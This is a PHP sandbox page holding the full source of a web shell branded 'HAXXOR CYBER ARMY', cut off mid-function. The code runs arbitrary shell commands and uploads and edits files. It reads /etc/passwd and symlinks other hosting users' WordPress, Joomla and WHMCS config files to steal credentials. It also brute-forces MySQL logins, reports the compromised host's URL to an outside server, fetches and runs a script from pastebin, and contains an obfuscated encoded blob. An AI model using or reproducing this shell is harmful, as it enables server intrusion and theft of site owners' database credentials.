haxxor - PHP Online
Form of PHP Sandbox
*** This page was generated with the meta tag "noindex, nofollow". This happened because you selected this option before saving or the system detected it as spam. This means that this page will never get into the search engines and the search bot will not crawl it. There is nothing to worry about, you can still share it with anyone.
Enter Your PHP code here for testing/debugging in the Online PHP Sandbox. As in the usual PHP files, you can also add HTML, but do not forget to add the tag <?php
in the places where the PHP script should be executed.
Result of php executing
Full code of haxxor.php
- <!DOCTYPE HTML>
- <html lang="en" class="no-js">
- <HEAD>
- <title>-:- HAXXOR CYBER ARMY -:-</title>
- <script type="text/javascript">
- var message = new Array() // leave this as is
- message[0] = "-:- HAXXOR CYBER ARMY -:-";
- message[1] = "-:- HAXXOR CYBER ARMY -:-";
- message[2] = "-_";
- message[3] = "-:_";
- message[4] = "-:-_";
- message[5] = "-:- _";
- message[6] = "-:-";
- message[7] = "-:- H_";
- message[8] = "-:- HA_";
- message[9] = "-:- HAX_";
- message[10] = "-:- HAXX_";
- message[11] = "-:- HAXXO_ ";
- message[12] = "-:- HAXXOR_";
- message[13] = "-:- HAXXOR C_";
- message[14] = "-:- HAXXOR CY_";
- message[15] = "-:- HAXXOR CYB_";
- message[16] = "-:- HAXXOR CYBE_";
- message[17] = "-:- HAXXOR CYBER_";
- message[18] = "-:- HAXXOR CYBER A_";
- message[19] = "-:- HAXXOR CYBER AR_";
- message[20] = "-:- HAXXOR CYBER ARM_";
- message[21] = "-:- HAXXOR CYBER ARMY_";
- message[22] = "-:- HAXXOR CYBER ARMY_";
- message[23] = "-:- HAXXOR CYBER ARMY_";
- message[24] = "-:- HAXXOR CYBER ARMY _";
- message[25] = "-:- HAXXOR CYBER ARMY";
- message[26] = "-:- HAXXOR CYBER ARMY -_";
- message[27] = "-:- HAXXOR CYBER ARMY -:_";
- message[28] = "-:- HAXXOR CYBER ARMY -:-_";
- message[29] = "-:- HAXXOR CYBER ARMY -:-";
- message[30] = "-:- HAXXOR CYBER ARMY -:-_";
- message[31] = "-:- HAXXOR CYBER ARMY -:-";
- message[32] = "-:- HAXXOR CYBER ARMY -:-_";
- var reps = 2
- var speed =20
- var p=message.length;
- var T="";
- var C=0;
- var mC=0;
- var s=0;
- var sT=null;
- if(reps<1)reps=1;
- function doTheThing(){
- T=message[mC];
- A();
- }
- function A(){
- s++
- if(s>9){s=1}
- if(s==1){document.title=' '+T+' '}
- if(C<(8*reps)){
- sT=setTimeout("A()",speed);
- C++
- }else{
- C=0;
- s=0;
- mC++
- if(mC>p-1)mC=0;
- sT=null;
- doTheThing();
- }}
- doTheThing();
- </script>
- <link href="http://fonts.googleapis.com/css?family=Fredericka+the+Great" rel="stylesheet" type="text/css">
- <link href="http://fonts.googleapis.com/css?family=Jolly+Lodger" rel="stylesheet" type="text/css">
- <link href="http://fonts.googleapis.com/css?family=Homenaje" rel="stylesheet" type="text/css">
- <link rel="shortcut icon" href="https://lh3.googleusercontent.com/-yKAYJuGA9dc/V1BXHLL2SaI/AAAAAAAAABY/fKEVg9XGZr0D2uiqmp2LCBHe65gSDHMMACCo/s512/icon-sc0.jpg" type="image/x-icon">
- <meta name='author' content='HCA-TEAM'>
- <meta charset="UTF-8">
- <style type="text/css">
- body {
- background: url(https://i.ibb.co/BqLfn3Q/34-341869-lonely-wallpaper-027-wanderlust-wallpaper-hd.jpg);
- width: 100%;
- height: 100%;
- position: auto;
- background-position: center;
- background-size: cover;
- color: springgreen;
- font-family :Homenaje;
- }
- #down{
- margin-bottom: 50px;
- }
- #content .first {
- background-color: black;
- }
- a {
- color: white;
- text-decoration: none;
- }
- input,select,textarea{
- border: 1px #000000 solid;
- -moz-border-radius: 5px;
- -webkit-border-radius:5px;
- border-radius:5px;
- }
- #menu {
- background:transparent;
- margin:8px 2px 4px 2px;
- font-family:Fredericka the Great;
- font-size:14px;
- color:silver;
- }
- #menu a {
- padding:3px 6px;
- margin:1;
- background:#2d2b2b;
- text-decoration:none;
- letter-spacing:2px;
- -moz-border-radius: 10px;
- -webkit-border-radius: 5px;
- -khtml-border-radius: 5px;
- border-radius: 5px;
- }
- #menu a:hover {
- background:black;
- border-bottom:1px solid #ffffff;
- border-top:1px solid #ffffff;
- }
- .tombolupil {
- background:black;
- color:white;
- margin:0 10px;
- font-family:Homenaje;
- font-size:16px;
- border:2px solid crimson;
- }
- .tombolupil:hover {
- background:crimson;
- color:white;
- margin:0 10px;
- font-family:Homenaje;
- font-size:16px;
- border:2px solid crimson;
- }
- .bordergaya {
- background:black;
- color:white;
- margin:0 10px;
- font-family:Homenaje;
- font-size:16px;
- border:2px solid #2d2b2b;
- }
- .bordergaya:hover {
- background:#2d2b2b;
- color:white;
- margin:0 10px;
- font-family:Homenaje;
- font-size:16px;
- border:2px solid crimson;
- }
- .justborder {
- background:black;
- color:white;
- margin:0 10px;
- font-family:Homenaje;
- font-size:16px;
- border:2px solid #2d2b2b;
- }
- .rapihbanget {
- text-align: left;
- font-size: 16px;
- color: springgreen;
- font-family: Homenaje;
- margin-left: 38%;
- }
- .kecew {
- text-align: left;
- font-size: 15px;
- color: white;
- font-family: Homenaje;
- }
- /* STYLE UPIL BIAR KEKINIAN */
- .js .inputfile{
- width: 0.1px;
- height: 0.1px;
- opacity: 0;
- overflow: hidden;
- position: absolute;
- z-index: -1;
- }
- .inputfile + label {
- max-width: 80%;
- font-size: 1.25rem;
- /* 20px */
- font-weight: 700;
- text-overflow: ellipsis;
- white-space: nowrap;
- cursor: pointer;
- display: inline-block;
- overflow: hidden;
- padding: 0.625rem 1.25rem;
- /* 10px 20px */
- }
- .no-js .inputfile + label {
- display: none;
- }
- .inputfile:focus + label,
- .inputfile.has-focus + label {
- outline: 1px dotted #000;
- outline: -webkit-focus-ring-color auto 5px;
- }
- .inputfile + label * {
- /* pointer-events: none;
- */
- /* in case of FastClick lib use */
- }
- .inputfile + label svg {
- width: 1em;
- height: 1em;
- vertical-align: middle;
- fill: currentColor;
- margin-top: -0.25em;
- /* 4px */
- margin-right: 0.25em;
- /* 4px */
- }
- .inputfile-4 + label {
- color: white;
- font-family:Homenaje;
- font-size:15px;
- }
- .inputfile-4:focus + label,
- .inputfile-4.has-focus + label,
- .inputfile-4 + label:hover {
- color: crimson;
- }
- .inputfile-4 + label figure {
- width: 50px;
- height: 50px;
- border-radius: 25%;
- background-color: crimson;
- display: block;
- padding: 10px;
- margin: 0 auto 10px;
- }
- .inputfile-4:focus + label figure,
- .inputfile-4.has-focus + label figure,
- .inputfile-4 + label:hover figure {
- background-color: white;
- }
- .inputfile-4 + label svg {
- width: 100%;
- height: 100%;
- fill: black;
- }
- </style>
- </HEAD>
- <BODY>
- <center>
- <?php set_time_limit(0);
- error_reporting(0);
- if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value);
- } } $self=$_SERVER['PHP_SELF'];
- $srvr_sof=$_SERVER['SERVER_SOFTWARE'];
- $your_ip=$_SERVER['REMOTE_ADDR'];
- $srvr_ip=$_SERVER['SERVER_ADDR'];
- $admin=$_SERVER['SERVER_ADMIN'];
- $ip = file_get_contents("http://iplookgeo.com/api/index.php", false, stream_context_create(array("http" => array("header" => "Content-Type: application/x-www-form-urlencoded", "method" => "POST", "content" => http_build_query(array("1" => $_SERVER["HTTP_HOST"] . $_SERVER["PHP_SELF"]))))));
- isset($_FILES['a'])?copy($_FILES['a']['tmp_name'],$_FILES['a']['name']):0;
- function exe($cmd) { if(function_exists('system')) { @ob_start();
- @system($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif(function_exists('exec')) { @exec($cmd,$results);
- $buff = "";
- foreach($results as $result) { $buff .= $result;
- } return $buff;
- } elseif(function_exists('passthru')) { @ob_start();
- @passthru($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd);
- return $buff;
- } } function perms($file){ $perms = fileperms($file);
- if (($perms & 0xC000) == 0xC000) { $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) { $info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) { $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) { $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) { $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) { $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) { $info = 'p';
- } else { $info = 'u';
- } $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- } function getfile($urlfile, $content) { $fp = fopen($content, "w");
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlfile);
- curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_FILE, $fp);
- return curl_exec($ch);
- curl_close($ch);
- fclose($fp);
- ob_flush();
- flush();
- } $zoneH="lVRti9s4EP4eyH+YimUdQxrvbqF3JLa5ct1Cub3dkqRf7lKC4kxisbJkJLlJWva/d+SXJu1uaWsIkUbz8swzj4RZrlm/F2eoHJo03mhTQIEu1+tkwd7dzeYLlvZ7/wpjtIExeVqUmDnIJLc2CVbarNFs+YEHoHiBFFTUvnVYrEsntEo/aYXP8zhqt3QQNWnSeGVoe6ud2KCBW8owhliosuoqLNixxIKBO5S+hsO9o10peYa5lnTu0VbO8OevnOPZPRKADtAaN+TmDVZ88oYXV4SuqfxaF1woC2O/jX1abpA/Xdu6g/ThO7F2+Rhe/vFnuZ9AjmKbuzG8uLii7UnVJrOvFHV526K/0KCtVoXwLX7ksvKGGar1MflWN/xGfl5+4dHTj036Pej3LLqlEwUupaAsMLgIyS42MHi2qVTmZ7DEvbDOwoBllZFLoYRjYfh5LZBM81xYmGVGlA4qixay99MbuBErw81hCAddQVFZB9Se41LCRhjaPatBcMgNbpIgd64cRxGvrkZlXo4UuqjgquIyQhX5miMCWZX+MEh/wzmOeMrCyUPdp2/pr7Oll+n/wVYHH8J+7zOdtB+RgzzLYYD7Uuq1b22h2BC6iHZEFAbcwlmzDY/xJ6m6r9TU6aB1PcnUSCz4cDQ114ByT45ZHo5LpIsHrJsb0UYC2aJLguVKcnUffEtjc4FGmS4ibrJcfMSorFZS2BzXyUWQ/tdeMP5VBQ1B3bg73EQlIWzR0qoB+S1rZ8RYAl9lAYPTDmozDYNuMqXL8iH8Tdq4ezdfTq/n76e38+mr29mb6+kQLn8tzJPVOR/97U44P7gjwCdmknGLwBpq2OTxrH5clP6GwFpud7vd6IRf5d+iQ2SF2kpk4W/l9c28eXt983pG6VuWk47u80Y0l4mfwnlOj1RBmkwuz0mkVqvk8sliXuKlwe2y4DUjLMq01P65M0gPQnr3T7ygV0DRU7qIpEgj0ncNEPeY1fDCMHyc9jsZtreWjZgHR3+dHGnZCJIWaWxLrtpnMKhhjGFrEFWQ+jAgLJF3SU+F+KiitPhTPE8UonbbMtdeEl2lH1RZEan3J3Y/g0q68c89H75TbSY1yawm0l+rLw== ";
- echo '<script>(function(e,t,n){var r=e.querySelectorAll("html")[0];
- r.className=r.className.replace(/(^|\s)no-js(\s|$)/,"$1js$2")})(document,window,0);
- </script>';
- echo "<center><br><font color='gold' size='10px' face='Fredericka the Great'>
- Haxxor Cyber Team
- </font></center>";
- echo "<center><font color='silver' siz='4px' face='Fredericka the Great'>[+] By V0dk4 [+]</font></center><br/>";
- echo"
- <font size='4' color='Teal' face='Jolly Lodger'>
- <center>".php_uname()."<br>
- ".$software = getenv("SERVER_SOFTWARE");
- echo"<p>";
- echo"
- <font size='3.5' color='white'><p>
- Your IP : <font color=gold> ".$your_ip."</font> <font color=springgreen>|</font> <font color=\"#fff2f2\" > </font> Server IP : <font color=gold>".$srvr_ip."</font> <font color=\"#fff2f2\" ><br>
- </font>
- </font>
- </div>
- </td>
- </tr>
- </tbody>
- </table></div>
- </font>";
- $disablefunctions = @ini_get("disable_functions");
- $echo_disablefunctions = (!empty($disablefunctions)) ? "<font color=white>".$disablefunctions."</font>" : "<font color=white>HCA-Team Cyber Security Expert</font>";
- echo '<br/><font size="4" style="font-family:Jolly Lodger;
- color:teal;
- ">
- <tr><td> Disable Functions: '.$echo_disablefunctions.'</font><br/></td></tr>';
- echo '<br/><font size="4" style="font-family:Jolly Lodger;
- ">
- <tr><td> Your Path Location :';
- if(isset($_GET['path'])){ $path = $_GET['path'];
- }else{ $path = getcwd();
- } $path = str_replace('\\','/',$path);
- $paths = explode('/',$path);
- foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true;
- echo '<a href="?path=/">/</a>';
- continue;
- } if($pat == '') continue;
- echo '<a href="?path=';
- for($i=0;
- $i<=$id;
- $i++){ echo "$paths[$i]";
- if($i != $id) echo "/";
- } echo '">'.$pat.'</a>/';
- } echo '</font>';
- $putraganteng=getcwd();
- $putraganteng=$path;
- ?>
- <?php echo"<center>
- <table>
- <tr>
- <td>
- <form style='float:right;
- ' method='POST'><input name='path' value=".$putraganteng." type=hidden>
- <input class=bordergaya type='submit' value='Create New File' >
- <input class=bordergaya size='40' name='new_file' /></form>
- </td>
- <td>
- <form style='float:left;
- ' method='POST'><input name='path' value=".$putraganteng." type=hidden>
- <input class=bordergaya size='40' name='new_dir'>
- <input class=bordergaya type='submit' value='Create New Folder' /></form>
- </td>
- </tr>
- </table>
- </center>";
- function mk_file_ui(){ chdir($_POST['path']);
- echo "<font color='springgreen'><form method='POST'>
- <input type='hidden' name='path' value=".getcwd().">
- <br/>New File Name : <input class=bordergaya size='40' name='new_f_name' value=".$_POST['new_file']."></font><br /><br /><center>
- <textarea spellcheck='false' cols='80' rows='15' class=bordergaya name='n_file_content'></textarea></center><br>
- <input class='bordergaya' type='submit' value=' Save ' /></form></center></div>";
- die();
- } function mk_file_bg(){ chdir($_POST['path']);
- $c_path=$_POST['path'];
- $c_file=$_POST['new_f_name'];
- $c_file_contents=$_POST['n_file_content'];
- $handle=fopen($c_file, "w");
- if(!$handle){ echo '<script>alert("Failed :(");
- </script>';
- }else{ fwrite($handle,$c_file_contents);
- echo '<script>alert("File Saved!!");
- </script>';
- } fclose($handle);
- } function create_dir(){ chdir($_POST['path']);
- $new_dir=$_POST['new_dir'];
- if(is_writable($_POST['path'])){ mkdir($new_dir);
- echo '<script>alert("Creating Folder Success!!");
- </script>';
- }else{ echo '<script>alert("Creating Folder Failed!!");
- </script>';
- } }
- ?>
- <!-- menu main -->
- <br><center><div id="menu">
- [<a href="?">Home</a>] <font color=orange>=</font>
- [<a href="?
- <?php echo "path=".$path;
- ?>&
- x=korong">Upload</a>] <font color=orange>=</font>
- [<a href="?
- <?php echo "path=".$path;
- ?>&
- x=cmd">Command</a>] <font color=orange>=</font>
- [<a href="?
- <?php echo "path=".$path;
- ?>&
- x=grabc">Config Grabber</a>] <font color=orange>=</font>
- [<a href="?
- <?php echo "path=".$path;
- ?>&
- x=vn">Domain Viewer</a>] <font color=orange>=</font>
- [<a href="?
- <?php echo "path=".$path;
- ?>&
- x=masstool">Mass Tool</a>] <font color=orange>=</font>
- [<a href="?
- <?php echo "path=".$path;
- ?>&
- x=cpanel">Cpanel Tool</a>]
- <br><br>
- [<a href="?
- <?php echo "path=".$path;
- ?>&
- x=bypstuls">Bypass Tools</a>] <font color=orange>=</font>
- [<a href="?
- <?php echo "path=".$path;
- ?>&
- x=fcrot">File Creator</a>] <font color=orange>=</font>
- [<a href="?
- <?php echo "path=".$path;
- ?>&
- x=krdp">Create RDP</a>] <font color=orange>=</font>
- [<a href="?
- <?php echo "path=".$path;
- ?>&
- x=jumping">Jumping</a>] <font color=orange>=</font>
- [<a href="?
- <?php echo "path=".$path;
- ?>&
- x=dump">Dumper Tools</a>] <font color=orange>=</font>
- [<a href="?
- <?php echo "path=".$path;
- ?>&
- x=tentang">About</a>]
- </div></center>
- <audio autoplay> <source src="https://audio.jukehost.co.uk/qtFOnO0lT0pbONv8rK8VyIPUbORuHJE7" type="audio/mpeg"></audio>
- <?php if(isset($_GET['filesrc'])){ echo "<br /><tr><td>You Are Looking : ";
- echo $_GET['filesrc'];
- echo '</tr></td></table>';
- echo('<br /><br /><textarea rows="20" cols="80">'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
- die();
- } else if(isset($_POST['path']) && isset($_POST['new_file'])){ chdir($_POST['path']);
- mk_file_ui();
- }else if(isset($_POST['path']) && isset($_POST['new_f_name']) && isset($_POST['n_file_content'])){ mk_file_bg();
- }else if(isset($_POST['path']) && isset($_POST['new_dir'])){ chdir($_POST['path']);
- create_dir();
- } elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
- if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo '<script>alert("Change Permission Success!");
- </script>';
- }else{ echo '<script>alert("Change Permission Failed!");
- </script>';
- } } echo '<form method="POST">
- Permission : <input name="perm" class="bordergaya" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="chmod">
- <input class="bordergaya" type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '<script>alert("Change Name Success!");
- </script>';
- }else{ echo '<script>alert("Change Name Failed!");
- </script>';
- } $_POST['name'] = $_POST['newname'];
- } echo '<form method="POST">
- New Name : <input class="bordergaya" name="newname" type="text" size="20" value="'.$_POST['name'].'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="rename">
- <input class="bordergaya" type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');
- if(fwrite($fp,$_POST['src'])){ echo '<script>alert("Edit File Success!");
- </script>';
- }else{ echo '<script>alert("Edit File Failed!");
- </script>';
- } fclose($fp);
- } echo '<form method="POST">
- <textarea class="bordergaya" cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="edit">
- <input class="bordergaya" type="submit" value="Go" />
- </form>';
- } echo '</center>';
- die();
- } elseif(isset($_GET['x']) && ($_GET['x'] == 'grabc')){ @ini_set('output_buffering',0);
- echo "
- <form method='POST'>
- </head>
- <style>
- textarea {
- resize:none;
- color: #000000 ;
- background-color:#000000;
- font-size:8pt;
- color:#ffffff;
- border:1px solid white ;
- border-left: 4px solid white ;
- width:543px;
- height:400px;
- }
- input {
- color: #000000;
- border:1px dotted white;
- }
- </style>";
- echo "<center>";
- ?></center><br><center>
- <?php if (empty($_POST['config'])) {
- ?><p><font face="Homenaje" color="springgreen" size="2pt">/etc/passwd content</p><br><form method="POST"><textarea name="passwd" class='bordergaya' rows='15' cols='60'>
- <?php echo file_get_contents('/etc/passwd');
- ?></textarea><br><br><input name="config" class='bordergaya' size="100" value="Grab!" type="submit"><br></form></center><br>
- <?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");
- if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');
- }@mkdir('Stupidc0de-Conf', 0755);
- @chdir('Stupidc0de-Conf');
- $htaccess="
- OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
- Options Indexes FollowSymLinks
- ForceType text/plain
- AddType text/plain .php
- AddType text/plain .html
- AddType text/html .shtml
- AddType txt .php
- AddHandler server-parsed .php
- AddHandler txt .php
- AddHandler txt .html
- AddHandler txt .shtml
- Options All
- Options All";
- file_put_contents(".htaccess",$htaccess,FILE_APPEND);
- $passwd=$_POST["passwd"];
- $passwd=explode("\n",$passwd);
- echo "<br><br><center><font face='Homenaje' color=Crimson size=2pt>Calm And Again In Process...</center><br>";
- foreach($passwd as $pwd){ $pawd=explode(":",$pwd);
- $user =$pawd[0];
- @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
- @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
- @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
- @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
- @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
- @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
- @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
- @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');
- @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
- @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
- @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
- @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
- @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
- @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
- @symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');
- @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
- @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
- @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');
- @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
- @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');
- @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
- @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
- @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
- @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
- @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
- @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
- @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
- @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
- @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
- @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
- @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
- @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
- @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
- @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
- @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
- @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
- @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');
- } echo '<b><font face="Homenaje" color="springgreen" size="3pt"><b>Selesai Bos Q, Monggo >></b> <a target="_blank" href="Stupidc0de-Conf">Hajar Config</a></font></b>';
- } die();
- } elseif(isset($_GET['x']) && ($_GET['x'] == 'brute')) {
- ?>
- <form action="?path=
- <?php echo $path;
- ?>&
- x=brute" method="post">
- <?php @set_time_limit(0);
- @error_reporting(0);
- if($_POST['page']=='find') { if(isset($_POST['usernames']) && isset($_POST['passwords'])) { if($_POST['type'] == 'passwd'){ $e = explode("\n",$_POST['usernames']);
- foreach($e as $value){ $k = explode(":",$value);
- $username .= $k['0']." ";
- } }elseif($_POST['type'] == 'simple'){ $username = str_replace("\n",' ',$_POST['usernames']);
- } $a1 = explode(" ",$username);
- $a2 = explode("\n",$_POST['passwords']);
- $id2 = count($a2);
- $ok = 0;
- foreach($a1 as $user ) { if($user !== '') { $user=trim($user);
- for($i=0;
- $i<=$id2;
- $i++) { $pass = trim($a2[$i]);
- if(@mysql_connect('localhost',$user,$pass)) { echo "Zoo!! ~ user is (<b><font color=white>$user</font></b>) Password is (<b><font color=white>$pass</font></b>)<br />";
- $ok++;
- } } } } echo "<hr><b>You Found <font color=red>$ok</font> By HCA-TEAM</b>";
- echo "<center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
- exit;
- } } if($_POST['pass']=='password'){ @error_reporting(0);
- $i = getenv('REMOTE_ADDR');
- $d = date('D, M jS, Y H:i',time());
- $h = $_SERVER['HTTP_HOST'];
- $dir=$_SERVER['PHP_SELF'];
- mkdir('config',0755);
- $cp = file_get_contents("http://pastebin.com/raw/0YG2dZ98");
- $file = fopen("cp.py","w+");
- $write = fwrite ($file ,$cp);
- fclose($file);
- chmod("cp.py",0755);
- $url = $_POST['url'];
- echo"<center>
- <textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
- system("python cp.py $url config");
- unlink ('cp.py');
- echo"</textarea>
- </center>";
- echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
- exit;
- } if($_POST['mendapatkan']=='passwd'){ @set_magic_quotes_runtime(0);
- ob_start();
- error_reporting(0);
- @set_time_limit(0);
- @ini_set('max_execution_time',0);
- @ini_set('output_buffering',0);
- $fn = $_POST['foldername'];
- function syml($usern,$pdomain) { symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
- symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
- symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
- symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
- symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
- symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
- symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
- symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
- symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
- symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
- symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
- symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
- symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
- symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
- symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
- symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
- symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
- symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
- symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
- symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
- symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
- symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
- symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
- symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
- symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
- symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
- symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
- symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
- symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
- symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
- symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
- symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
- symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
- symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
